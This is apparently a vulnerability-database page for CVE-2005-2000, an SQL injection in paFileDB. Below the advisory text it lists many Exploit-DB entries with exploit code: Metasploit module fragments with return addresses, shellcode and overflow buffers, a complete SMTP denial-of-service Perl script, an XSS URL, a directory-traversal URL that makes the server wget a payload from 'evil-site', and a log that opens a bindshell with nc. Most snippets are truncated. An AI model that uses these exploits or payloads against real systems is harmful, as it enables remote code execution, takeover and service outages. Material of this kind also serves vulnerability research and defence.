CVE-2005-2000
published 2005-06-15CVE-2005-2000: Multiple SQL injection vulnerabilities in paFileDB 3.1 and earlier allow remote attackers to execute arbitrary SQL commands via the formname parameter (1) in…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.44%
82.3th percentile
Multiple SQL injection vulnerabilities in paFileDB 3.1 and earlier allow remote attackers to execute arbitrary SQL commands via the formname parameter (1) in the login form, (2) in the team login form, or (3) to auth.php, (4) select, (5) id, or (6) query parameter to pafiledb.php, or (7) string parameter to search.php.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jpcx-2gp7-wqj7: Multiple SQL injection vulnerabilities in paFileDB 3
ghsa_unreviewed·2022-05-01
CVE-2005-2000 [HIGH] GHSA-jpcx-2gp7-wqj7: Multiple SQL injection vulnerabilities in paFileDB 3
Multiple SQL injection vulnerabilities in paFileDB 3.1 and earlier allow remote attackers to execute arbitrary SQL commands via the formname parameter (1) in the login form, (2) in the team login form, or (3) to auth.php, (4) select, (5) id, or (6) query parameter to pafiledb.php, or (7) string parameter to search.php.
GHSA
GHSA-vr29-hp79-9fjh: SQL injection vulnerability in includes/search
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3808 [HIGH] GHSA-vr29-hp79-9fjh: SQL injection vulnerability in includes/search
SQL injection vulnerability in includes/search.php in paFileDB 3.6 allows remote attackers to execute arbitrary SQL commands via the categories[] parameter in a search action to index.php, a different vector than CVE-2005-2000.
No detection rules found.
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb·2011-02-08
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb·2011-01-24
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
exploitdb·2010-08-30
CVE-2005-1983 Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
---
##
# $Id: ms05_039_pnp.rb 10190 2010-08-30 20:40:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Plug and Play Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account.
NOTE: Since the PnP service runs inside the service.exe process, a failed
exploit attempt will cause the system to automatically reboot.
Exploit-DB
Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2005-4411 Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)
Mercury/32 'Mercury/32 %q{
This module exploits a stack-based buffer overflow in
Mercury/32 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9525 $',
'References' =>
[
[ 'CVE', '2005-4411' ],
[ 'OSVDB', '22103'],
[ 'BID', '16396' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
[ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ],
],
'Privileged' => true,
'DisclosureDate' => 'Dec 19 2005',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(105)], self)
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = rand_text_alphanumeric(224, payload_badc
Exploit-DB
FutureSoft TFTP Server 2000 - Transfer-Mode Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2005-1812 FutureSoft TFTP Server 2000 - Transfer-Mode Overflow (Metasploit)
FutureSoft TFTP Server 2000 - Transfer-Mode Overflow (Metasploit)
---
##
# $Id: futuresoft_transfermode.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the FutureSoft TFTP Server
2000 product. By sending an overly long transfer-mode string, we were able
to overwrite both the SEH and the saved EIP. A subsequent write-exception
that will occur allows the transferring of execution to our
Exploit-DB
QuickerSite 1.8.5 - Multiple Vulnerabilities
exploitdb·2008-06-03
CVE-2008-6678 QuickerSite 1.8.5 - Multiple Vulnerabilities
QuickerSite 1.8.5 - Multiple Vulnerabilities
---
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: QuickerSite Multiple Vulnerabilities
# Vendor: www.quickersite.com
# Vulnerable Version: 1.8.5
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/39
###################################################################################
####################
1. Description:
####################
QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1
Exploit-DB
ClanLite 2.x - SQL Injection / Cross-Site Scripting
exploitdb·2008-05-12
CVE-2008-5215 ClanLite 2.x - SQL Injection / Cross-Site Scripting
ClanLite 2.x - SQL Injection / Cross-Site Scripting
---
########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################
ClanLite V2 SQL inj. & XSS
dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005
dork: Themed By Ray © 2003, 2004 iOptional
readme script
/****************************************************************************
* Fichier : *
* Copyright : (C) 2004 ClanLite V2 *
* Email : [email protected] *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
******************************************************************
Exploit-DB
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
exploitdb·2007-04-01
CVE-2005-1255 IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses SEH overwrite method, which doesn't work on Windows XP SP2,
* so i have written the exploit that overwrites EI
Exploit-DB
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
exploitdb·2007-03-21
CVE-2007-1579 Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
---
#!/usr/bin/python
# Remote exploit for the stack overflow vulnerability in Mercur Messaging 2005
# SP3 IMAP service. The exploit was tested on windows 2000 server SP4 in a
# Vmware environment. At the time of overflow EBX points to our shellcode.
# However this buffer into which EBX points will give a maximum of 224 bytes of
# uninterrupted space for shellcode. So for my analysis is settled for a useradd
# shellcode which comes to 224 bytes :-). However looking at it a little bit
# further i found that you can send SUBSCRIBE request just before the actual
# command that causes the overflow and you have a shellcode space of 520 bytes
# further down the stack. So you can club the 224 bytes you get at overflow t
Exploit-DB
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)
exploitdb·2006-06-14
CVE-2006-2374 Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)
---
///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4
// Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES.
// -----------------------------------------------------------------------------------
// Rubén Santamarta.
// www.reversemode.com
// -----------------------------------------------------------------------------------
// OVERVIEW
// -------------------------------------------------------
Exploit-DB
Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
exploitdb·2006-01-16
CVE-2005-3116 Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow
---
/*
DESCRIPTION
Veritas NetBackup Stack Overflow (tcp/13701)
"Volume Manager Daemon" Module
Advisories
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
http://www.frsirt.com/english/advisories/2005/2349
USAGE
C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
Sending first buffer.
Sending second buffer.
C:\NetBackup>nc 192.168.0.200 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
INFORMATION
I wrote this just for educational purposes :).
Because the buffer is only very small, I had to write small shellcode.
The code is less than 100 bytes, and there are 6 bytes left.
Exploit-DB
Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)
exploitdb·2006-01-05
CVE-2005-2827 Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)
Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)
---
/* helper.c commented out below ms05-055.c /str0ke */
/*
MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
Created by SoBeIt
12.25.2005
Main file of exploit
Tested on:
Windows 2000 PRO SP4 Chinese
Windows 2000 PRO SP4 Rollup 1 Chinese
Windows 2000 PRO SP4 English
Windows 2000 PRO SP4 Rollup 1 English
Usage:ms05-055.exe helper.exe
*/
#include
#include
#include
#include
#define NTSTATUS ULONG
#define ProcessBasicInformation 0
typedef VOID (NTAPI *PKNORMAL_ROUTINE)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _PROCESS_B
Exploit-DB
Watchfire AppScan QA 5.0.x - Remote Code Execution
exploitdb·2005-12-15
CVE-2005-4270 Watchfire AppScan QA 5.0.x - Remote Code Execution
Watchfire AppScan QA 5.0.x - Remote Code Execution
---
# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script to setup the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual mode.
# 3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly.
#
# PoC developed for Windows 2000 Server SP4.
#
#!/usr/bin/perl -w
use IO::Socket::INET;
# Dissable buffering
$| = 1;
# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=ISO-8859-1\r\n\r\nadmin";
# Define the 401 Auth Required Header and Tail
my $r
Exploit-DB
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
exploitdb·2005-12-08
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB
Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service
exploitdb·2005-12-01
CVE-2005-3981 Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service
Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service
---
// source: https://www.securityfocus.com/bid/15671/info
Microsoft Windows is prone to a local denial of service vulnerability. This issue can allow an attacker to trigger a system wide denial of service condition or terminate arbitrary processes.
Reports indicate that a process can call the 'CreateRemoteThread' function to trigger this issue.
It was reported that this attack can be carried out by a local unprivileged user.
#include
#include
#include
BOOL exploit(char* chProcessName)
{
HANDLE hProcessSnap = NULL;
HANDLE hProcess = NULL;
BOOL bFound = FALSE;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
UINT uExitCode = 0;
DWORD dwExitCode = 0;
LPDWORD lpExitCode = &dwExitCode;
hProcessSnap = Cre
Exploit-DB
Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
exploitdb·2005-11-30
CVE-2005-2124 Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
---
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed.
*
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mt
Exploit-DB
Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
exploitdb·2005-11-29
CVE-2005-2124 Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)
---
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile from this code when viewed in internet explorer raises the CPU utilization
* to 100%. The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed
*
* Disclaimer: This code is for educational/testing purposes by authosized persons on
* networks/systems setup for such a purpose.The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00"
"\x09\x00"
"\x00\x03"
"\xff\xff\xff\xff" //Metafile file size
"\x04\x00
Exploit-DB
Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)
exploitdb·2005-11-27
CVE-2005-2119 Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)
Microsoft Windows - MSDTC Service Remote Memory Modification (PoC) (MS05-051)
---
/*
\ MSDTC remote PoC exploit
/ by Darkeagle
\
/
\ Unl0ck Research Team
/
\
/ Greetingz: all UKT boys, 0x557 guys, Sowhat, GHC/RST guys
\
/ Exploit tested on: Windows 2000 Professional Russian Service Pack 4
\
/ http://exploiterz.org || http://55k7.org
\
/ Reference: http://security.nnov.ru/Jdocument906.html
\
/ ."by default on all Windows 2000 systems."
\ it's false: by default in my system msdtc service turned off.
*/
#include
#include
#include
#include
unsigned char packet1[] =
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00"
"\x00\x00\x01\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x01\x00\xe0\x0c\x6b\x90\x0b\xc7\x67\x10\xb3\x17"
"\x00\xdd\x01\x06\x62\xda\x01\x00\x00\x00\x04\x5d\x
Exploit-DB
Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service
exploitdb·2005-11-16
CVE-2005-3644 Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service
Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service
---
/*
* Author: Winny Thomas
* Nevis Labs, Pune, INDIA
*
* Details:
* While working on the exploit for MS05-047 i came across a condition where
* a specially crafted request to upnp_getdevicelist would cause
* services.exe to consume memory to a point where the target machines virtual
* memory gets exhausted. This exploit is NOT similar to the MS05-047 exploit i
* published earlier. The earlier one trashed the EIP of the target causing a
* crash in services.exe and eventually brought down the system to shut down.
* However in this exploit (again a DOS) the virtual memory is consumed to a
* point where desktop requests (like clicking "My Computer"), HTTP requests,
* SMB requests etc does not get serviced f
Exploit-DB
Snitz Forum 2000 - 'post.asp' Cross-Site Scripting
exploitdb·2005-10-31
CVE-2005-3411 Snitz Forum 2000 - 'post.asp' Cross-Site Scripting
Snitz Forum 2000 - 'post.asp' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/15241/info
Snitz Forum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+chat&type=">alert("PWND")
Exploit-DB
Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)
exploitdb·2005-10-11
CVE-2005-1979 Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)
Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)
---
source: https://www.securityfocus.com/bid/15058/info
The Microsoft Windows MSDTC (Microsoft Distribution Transaction Coordinator) service is prone to a denial of service vulnerability.
The vulnerability exists in the TIP (Transaction Internet Protocol) functionality that is provided by MSDTC. This vulnerability may be exploited by a remote attacker to deny the availability of services that depend on MSDTC.
This issue only exists on operating systems that have support for the TIP protocol enabled. This vulnerability is remotely exploitable on default configurations on Windows 2000. TIP is not enabled by default on Windows XP and Windows Server 2003 even if the MSDTC service is running.
Update: Microsoft report
Exploit-DB
Microsoft Windows Plug-and-Play Service - Remote Universal (MS05-039)
exploitdb·2005-08-12
CVE-2005-1983 Microsoft Windows Plug-and-Play Service - Remote Universal (MS05-039)
Microsoft Windows Plug-and-Play Service - Remote Universal (MS05-039)
---
/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit + no crash shellcode
*
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerabili
Exploit-DB
Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)
exploitdb·2005-08-11
CVE-2005-1983 Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)
Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)
---
/*
Windows 2000 universal exploit for MS05-039
-\x6d\x35\x6c\x30\x6e\x6e\x79-
*/
#define WIN32_LEAN_AND_MEAN
#include
#include
#include
#include
#include
#include
#include
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
BYTE Data1[0x68] =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,
0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2
Exploit-DB
Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service
exploitdb·2005-07-12
CVE-2005-2242 Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service
Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service
---
source: https://www.securityfocus.com/bid/14251/info
The CallManager CTI Manager service is susceptible to a remote denial of service vulnerability.
This issue is documented in Cisco bug CSCee00116, which is available to Cisco customers.
This issue may be exploited to cause the affected application to restart, denying service to legitimate users.
This issue was originally documented in BID 14227.
wget http://www.example.com:2000
Exploit-DB
Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow
exploitdb·2005-07-05
CVE-2005-2087 Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow
Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow
---
# Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit
# 01 July 2005
#
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx
# sec-consult - http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# I
Exploit-DB
Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
exploitdb·2005-06-29
CVE-2005-0059 Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
---
/* HOD-ms05017-msmq-expl.c: 2005-06-28: PUBLIC v.0.3
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-017) Message Queuing Buffer Overflow Vulnerability
* Universal Exploit
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* [ http://www.livejournal.com/users/houseofdabus
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows XP SP1
* - Windows 2000 SP4
* - Windows 2000 SP3
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in Message Queuing
* that could allow an attacker who successfully exploited this
* vulnerability to take complete control of the affected system.
*
* ---
Exploit-DB
PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password
exploitdb·2005-06-15
CVE-2005-2000 PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password
PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password
---
#!/usr/bin/perl
######################################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m #
######################################################################################
# EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v) #
#Email: [email protected] #
# #
# #
# + Discovered By: GulfTech #
# + Advisory: https://www.securityfocus.com/bid/13967 #
#Vulnerable: PHP Arena paFileDB 1.1.3 and Older #
######################################################################################
# GR33tz T0 ==> mh_p0rtal -- oil_Karchack -- Dr_CephaleX -- Str0ke #
#And Iranian Security & Hackin
Exploit-DB
GoodTech SMTP Server 5.14 - Denial of Service
exploitdb·2005-06-07
CVE-2005-1931 GoodTech SMTP Server 5.14 - Denial of Service
GoodTech SMTP Server 5.14 - Denial of Service
---
#===== Start GoodTechSMTPServer_DOS.pl =====
#
# Usage: GoodTechSMTPServer_DOS.pl
# GoodTechSMTPServer_DOS.pl 127.0.0.1
#
# GoodTech SMTP Server for Windows NT/2000/XP version 5.14
#
# Download:
# http://www.goodtechsys.com/
#
##########################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill GoodTech SMTP Server at $ARGV[0]:25...";
sleep(1);
print $socket "HELO moto.com\r\n";
sleep(1);
print $socket "RCPT TO: A\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}
#===== End GoodTechSMTPServer_DOS.pl =====
# milw0rm.com [2005-06-07]
Exploit-DB
FutureSoft TFTP Server 2000 - Remote Denial of Service
exploitdb·2005-06-02
CVE-2005-1812 FutureSoft TFTP Server 2000 - Remote Denial of Service
FutureSoft TFTP Server 2000 - Remote Denial of Service
---
/*
*
* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
* http://www.futuresoft.com/products/lit-tftp2000.htm
* Bug Discovered by SIG^2 (http://www.security.org.sg)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan
* Usage:tftp_exp [targetPort]
*
*/
/*
*
* Vulnerable Versions:
* TFTP Server 2000 Evaluation Version 1.0.0.1
*
*/
#include
#include
#pragma comment(lib, "ws2_32.lib")
/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
char expbuffer[] =
"\x00\x01"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x4
Exploit-DB
pserv 3.2 - Directory Traversal
exploitdb·2005-05-16
CVE-2005-1365 pserv 3.2 - Directory Traversal
pserv 3.2 - Directory Traversal
---
source: https://www.securityfocus.com/bid/13642/info
pServ is prone to a directory traversal vulnerability. This occurs because the application does not implement a proper method for filtering directory traversal sequences from URIs. Since this can be done from the cgi-bin directory, it is possible to execute commands to which the Web server has permission.
This issue was reported to affect pServ version 3.2; earlier versions are like vulnerable.
The following url downloads a script (or executable) to the server:
http://www.example.com:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl
This is how the script can be executed afterwards:
http://www.example.com:2000/cgi-bin///////////../../../../..
Exploit-DB
GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
exploitdb·2005-05-01
CVE-2005-1415 GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
GlobalScape Secure FTP Server 3.0 - Remote Buffer Overflow
---
#!/usr/bin/python
###############################################
# GlobalScape Secure FTP Server Buffer Overflow
# Coded by [email protected]
# http://www.see-security.com
# http://www.hackingdefined.com/exploits/Globalscape30.pdf
###############################################
# EIP Overwrite
# root@[muts]# ./globalscape-3.0-ftp.py
#
# [+] Evil GlobalFTP 3.0 Secure Server Exploit
# [+] Coded by mati [at] see-security [dot] com
# [+] 220 GlobalSCAPE Secure FTP Server (v. 3.0) * UNREGISTERED COPY *
#
